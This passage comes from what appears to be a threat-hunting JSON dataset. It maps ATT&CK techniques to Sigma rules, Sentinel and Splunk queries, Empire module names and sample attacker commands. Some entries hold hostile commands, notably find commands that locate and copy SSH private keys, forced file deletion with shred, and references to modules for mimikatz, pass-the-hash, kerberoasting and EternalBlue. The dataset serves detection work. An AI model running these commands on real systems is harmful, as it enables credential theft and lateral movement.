\"services.exe\" ) or ( process_path contains \"taskhost.exe\" and ( process_parent_command_line !contains \"services.exe\" and process_parent_command_line !contains \"svchost.exe\" ) ) or ( process_path contains \"taskhostw.exe\" and ( process_parent_command_line !contains \"services.exe\" and process_parent_command_line !contains \"svchost.exe\" ) ) or ( process_path contains \"userinit.exe\" and ( process_parent_command_line !contains \"dwm.exe\" and process_parent_command_line !contains \"winlogon.exe\" ) ))| extend AccountCustomEntity = UserName| extend HostCustomEntity = Computer| extend FileHashCustomEntity = hash_sha256", + "name": "Process Hollowing" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "LMD - B9" + ], + [ + "API monitoring" + ], + [ + "Check with Fred" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "API monitoring" + ], + [ + "Check with Fred" + ] + ], + "external_reference": [ + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + { + "technique_id": "T1096", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"fsutil.exe\" and process_command_line contains \"*usn*deletejournal*\"", + "name": "NTFS File Attributes" + } + ], + "possible_detections": [ + { + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "experimental", + "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", + "references": [ + "http://www.powertheshell.com/ntfsstreams/" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1096" + ], + "author": "Sami Ruohonen", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keyword1": [ + "set-content" + ], + "keyword2": [ + "-stream" + ], + "condition": "keyword1 and keyword2" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + [ + "4663", + "File monitoring" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "LMD", + "EA", + " ADS", + "Hash Compare" + ], + [ + "4663", + "File monitoring" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "LOG-MD", + "Hash Compare" + ] + ], + "external_reference": [ + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1107", + "command_list": [ + "```", + "rm -rf test1.text", + "rm -f test1.txt", + "shred -u test1.txt" + ], + "commands": [ + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm -rf test1.text", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm -f test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "shred -u test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"*remove-item*\"or process_command_line contains \"vssadmin*Delete Shadows /All /Q*\"or process_command_line contains \"*wmic*shadowcopy delete*\"or process_command_line contains \"*wbdadmin* delete catalog -q*\"or process_command_line contains \"*bcdedit*bootstatuspolicy ignoreallfailures*\"or process_command_line contains 
\"*bcdedit*recoveryenabled no*\")", + "name": "File Deletion" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=59 comm=shred | table host,auid,msg", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=execve shred .bash_history | table host,msg,a0,a2", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=263 | table host,auid,uid,eid,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=82 exe=/usr/bin/shred | table host,auid,uid,eid,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -S execve,execveat -F auid>=1000 -F auid!=-1 -F key=program_execution", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bash_history -p rwa -k bash_history_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"rm *\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"shred -u *\"", + "name": "" + }, + { + 
"product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "experimental", + "description": "Detects backup catalog deletions", + "references": [ + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100" + ], + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", + "tags": [ + "attack.defense_evasion", + "attack.t1107" + ], + "logsource": { + "product": "windows", + "service": "application" + }, + "detection": { + "selection": { + "EventID": 524, + "Source": "Backup" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + 
"https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://citizenlab.org/2016/08/group5-syria/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1118", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_path contains \"InstallUtil.exe\"or process_command_line contains \"\\\\/logfile= \\\\/LogToConsole=false \\\\/U\")", + "name": "InstallUtil" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "ID 1 & 7", + "Sysmon" + ], + [ + "4688", + "Process 
Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1126", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"and process_command_line contains \"net delete\")or process_command_line contains \"Remove-SmbShare\"or process_command_line contains \"Remove-FileShare\"", + "name": "Network Share Connection Removal" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Packet capture" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-union" + ] + }, + { + "technique_id": "T1130", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and process_path !contains \"svchost.exe\"and (registry_key_path contains \"*\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\*\"or registry_key_path contains \"*\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\")", + "name": "Install Root Certificates" + } + ], + "possible_detections": [ + [ + "4657", + "Reg Audit" + ], + [ + "SSL/TLS inspection" + ], + [ + "Digital Certificate Logs" + ], + [ + "4657", + "Reg Audit" + ], + [ + "SSL/TLS inspection" + ], + [ + "Digital Certificate Logs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1179", + "command_list": [ + "powershell/collection/netripper" + ], + "commands": [ + { + "command": "powershell/collection/netripper", + 
"source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/collection/netripper", + "ATT&CK Technique #1": "T1179", + "ATT&CK Technique #2": "", + "Technique": "Hooking", + "Concatenate for Python Dictionary": "\"powershell/collection/netripper\": [\"T1179\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"mavinject.exe\"or process_command_line contains \"/INJECTRUNNING\")", + "name": "Hooking" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "Windows event logs" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "4688", + "Process Execution" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1209", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders\\\\\"", + "name": "Time Providers" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "DLL monitoring" + ], + [ + "Loaded DLLs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ], + [ + "API monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + 
"external_reference": [] + }, + { + "technique_id": "T1214", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"reg query HKLM \\\\/f password \\\\/t REG_SZ \\\\/s\"or process_command_line contains \"reg query HKCU \\\\/f password \\\\/t REG_SZ \\\\/s\"or process_command_line contains \"Get-UnattendedInstallFile\"or process_command_line contains \"Get-Webconfig\"or process_command_line contains \"Get-ApplicationHost\"or process_command_line contains \"Get-SiteListPassword\"or process_command_line contains \"Get-CachedGPPPassword\"or process_command_line contains \"Get-RegistryAutoLogon\")", + "name": "Credentials In Registry" + } + ], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1171", + "command_list": [ + "powershell/collection/inveigh", + "powershell/lateral_movement/inveigh_relay" + ], + "commands": [ + { + "command": "powershell/collection/inveigh", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/lateral_movement/inveigh_relay", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/collection/inveigh", + "ATT&CK Technique #1": "T1171", + "ATT&CK Technique #2": "", + "Technique": "LLMNR/NBT-NS Poisoning", + "Concatenate for Python Dictionary": "\"powershell/collection/inveigh\": [\"T1171\"]," + }, + { + "Empire Module": "powershell/lateral_movement/inveigh_relay", + "ATT&CK Technique 
#1": "T1171", + "ATT&CK Technique #2": "", + "Technique": "LLMNR/NBT-NS Poisoning", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/inveigh_relay\": [\"T1171\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "references": [ + "https://twitter.com/SBousseaden/status/1195284233729777665" + ], + "author": "@SBousseaden, Florian Roth", + "date": "2019/11/15", + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1171" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 3, + "TargetUserName": "ANONYMOUS_LOGON", + "WorkstationName": "-", + "SourceNetworkAddress": "127.0.0.1" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4657", + "Windows Registry" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4657", + "Windows Registry" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1141", + "command_list": [ + "powershell/collection/prompt", + "python/collection/osx/prompt", + "python/collection/osx/screensaver_alleyoop" + ], + "commands": [ + { + "command": "powershell/collection/prompt", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/prompt", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": 
"python/collection/osx/screensaver_alleyoop", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/collection/prompt", + "ATT&CK Technique #1": "T1141", + "ATT&CK Technique #2": "", + "Technique": "Input Prompt", + "Concatenate for Python Dictionary": "\"powershell/collection/prompt\": [\"T1141\"]," + }, + { + "Empire Module": "python/collection/osx/prompt", + "ATT&CK Technique #1": "T1141", + "ATT&CK Technique #2": "", + "Technique": "Input Prompt", + "Concatenate for Python Dictionary": "\"python/collection/osx/prompt\": [\"T1141\"]," + }, + { + "Empire Module": "python/collection/osx/screensaver_alleyoop", + "ATT&CK Technique #1": "T1141", + "ATT&CK Technique #2": "", + "Technique": "Input Prompt", + "Concatenate for Python Dictionary": "\"python/collection/osx/screensaver_alleyoop\": [\"T1141\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html" + ] + }, + { + "technique_id": "T1208", + "command_list": [ + "powershell/credentials/invoke_kerberoast" + ], + "commands": [ + { + "command": "powershell/credentials/invoke_kerberoast", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/credentials/invoke_kerberoast", + "ATT&CK Technique #1": "T1208", + "ATT&CK Technique #2": "", + "Technique": "Kerberoasting", + "Concatenate for Python Dictionary": "\"powershell/credentials/invoke_kerberoast\": [\"T1208\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Possible SPN Enumeration", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "description": "Detects Service Principal Name Enumeration 
used for Kerberoasting", + "status": "experimental", + "references": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation" + ], + "author": "Markus Neis, keepwatch", + "date": "2018/11/14", + "tags": [ + "attack.credential_access", + "attack.t1208" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_image": { + "Image": "*\\setspn.exe" + }, + "selection_desc": { + "Description": "*Query or reset the computer* SPN attribute*" + }, + "cmd": { + "CommandLine": "*-q*" + }, + "condition": "(selection_image or selection_desc) and cmd" + }, + "falsepositives": [ + "Administrator Activity" + ], + "level": "medium" + }, + { + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "references": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity" + ], + "tags": [ + "attack.credential_access", + "attack.t1208" + ], + "description": "Detects service ticket requests using RC4 encryption type", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4769, + "TicketOptions": "0x40810000", + "TicketEncryptionType": "0x17" + }, + "reduction": [ + { + "ServiceName": "$*" + } + ], + "condition": "selection and not reduction" + }, + "falsepositives": [ + "Service accounts used on legacy systems (e.g. 
NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "level": "medium" + }, + [ + "4769", + "Windows event logs" + ], + [ + "4769", + "Windows event logs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1145", + "command_list": [ + "powershell/credentials/mimikatz/certs", + "powershell/credentials/mimikatz/keys", + "**Private Keys:**", + "find / -type f \\( -name \"*.pem\" -o -name \"*.pgp\" -o -name \"*.gpg\" -o -name \"*.ppk\" -o -name \"*.p12\" -o -name \"*.key\" -o -name \"*.pfx\" -o -name \"*.cer\" -o -name \"*.p7b\" -o -name \"*.asc\" -o -name \"authorized*\" \\)", + "**look for Users' SSH Private Key:** find / -name id_rsa OR find / -name id_dsa", + "**Copy Private SSH Keys with CP:** find / -name id_rsa -exec cp --parents {} #{output_folder} \\;", + "find / -name id_dsa -exec cp --parents {} #{output_folder} \\;", + "**Copy Private SSH Keys with rsync:**", + "find / -name id_rsa -exec rsync -R {} #{output_folder} \\;", + "find / -name id_dsa -exec rsync -R {} #{output_folder} \\;" + ], + "commands": [ + { + "command": "powershell/credentials/mimikatz/certs", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/keys", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "**Private Keys:**", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -type f \\( -name \"*.pem\" -o -name \"*.pgp\" -o -name \"*.gpg\" -o -name \"*.ppk\" -o -name \"*.p12\" -o -name \"*.key\" -o -name \"*.pfx\" -o -name \"*.cer\" -o -name \"*.p7b\" -o -name \"*.asc\" -o -name \"authorized*\" \\)", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "**look for Users' SSH Private Key:** find / -name id_rsa OR find / -name id_dsa", + "source": "Kirtar22/Litmus_Test", + "name": "" + 
}, + { + "command": "**Copy Private SSH Keys with CP:** find / -name id_rsa -exec cp --parents {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -name id_dsa -exec cp --parents {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "**Copy Private SSH Keys with rsync:**", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -name id_rsa -exec rsync -R {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -name id_dsa -exec rsync -R {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/credentials/mimikatz/certs", + "ATT&CK Technique #1": "T1145", + "ATT&CK Technique #2": "", + "Technique": "Private Keys", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/certs\": [\"T1145\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/keys", + "ATT&CK Technique #1": "T1145", + "ATT&CK Technique #2": "", + "Technique": "Private Keys", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/keys\": [\"T1145\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "index=* sourcetype=bash_history find AND (.pem OR authorized OR gpg OR pgp OR .ppk OR .cer OR .key OR .asc)", + "name": "" + }, + { + "product": "Splunk", + "query": "index=* sourcetype=bash_history find AND (id_rsa OR id_dsa)", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs", + [ + "4657", + "File monitoring" + ], + [ + "4657", + "File monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1075", + "command_list": [ + "powershell/credentials/mimikatz/pth" + ], + "commands": [ + { + "command": "powershell/credentials/mimikatz/pth", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module 
Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/credentials/mimikatz/pth", + "ATT&CK Technique #1": "T1075", + "ATT&CK Technique #2": "", + "Technique": "Pass the Hash", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/pth\": [\"T1075\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "status": "experimental", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "references": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html" + ], + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "date": "2018/02/12", + "tags": [ + "attack.lateral_movement", + "attack.t1075", + "attack.s0002" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 9, + "LogonProcessName": "seclogo", + "AuthenticationPackageName": "Negotiate" + }, + "condition": "selection" + }, + "falsepositives": [ + "Runas command-line tool using /netonly parameter" + ], + "level": "high" + }, + { + "title": "Pass the Hash Activity", + "id": "f8d98d6c-7a07-4d74-b064-dd4a3c244528", + "status": "experimental", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "references": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events" + ], + "author": "Ilias el Matani (rule), The Information Assurance Directorate at the NSA (method)", + "tags": [ + "attack.lateral_movement", + "attack.t1075", + "car.2016-04-004" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt 
would trigger an event ID 4625" + }, + "detection": { + "selection": [ + { + "EventID": 4624, + "LogonType": "3", + "LogonProcessName": "NtLmSsp", + "WorkstationName": "%Workstations%", + "ComputerName": "%Workstations%" + }, + { + "EventID": 4625, + "LogonType": "3", + "LogonProcessName": "NtLmSsp", + "WorkstationName": "%Workstations%", + "ComputerName": "%Workstations%" + } + ], + "filter": { + "AccountName": "ANONYMOUS LOGON" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrator activity", + "Penetration tests" + ], + "level": "medium" + }, + { + "title": "Pass the Hash Activity", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "production", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "references": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/" + ], + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "tags": [ + "attack.lateral_movement", + "attack.t1075" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The successful use of PtH for lateral movement between workstations would trigger event ID 4624" + }, + "detection": { + "selection": [ + { + "EventID": 4624, + "SubjectUserSid": "S-1-0-0", + "LogonType": "3", + "LogonProcessName": "NtLmSsp", + "KeyLength": "0" + }, + { + "EventID": 4624, + "LogonType": "9", + "LogonProcessName": "seclogo" + } + ], + "filter": { + "AccountName": "ANONYMOUS LOGON" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrator activity", + "Penetration tests" + ], + "level": "medium" + }, + { + "title": "NTLM Logon", + "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "status": "experimental", + "description": "Detects logons using 
NTLM, which could be caused by a legacy source or attackers", + "references": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT" + ], + "author": "Florian Roth", + "date": "2018/06/08", + "tags": [ + "attack.lateral_movement", + "attack.t1075" + ], + "logsource": { + "product": "windows", + "service": "ntlm", + "definition": "Reqiures events from Microsoft-Windows-NTLM/Operational" + }, + "detection": { + "selection": { + "EventID": 8002, + "CallingProcessName": "*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legacy hosts" + ], + "level": "low" + }, + [ + "4624", + "Authentication logs" + ], + [ + "4624", + "Authentication logs" + ] + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1210", + "command_list": [ + "powershell/exploitation/exploit_jboss", + "powershell/exploitation/exploit_jenkins", + "powershell/situational_awareness/network/get_exploitable_system", + "powershell/exploitation/exploit_eternalblue" + ], + "commands": [ + { + "command": "powershell/exploitation/exploit_jboss", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/exploitation/exploit_jenkins", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_exploitable_system", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + 
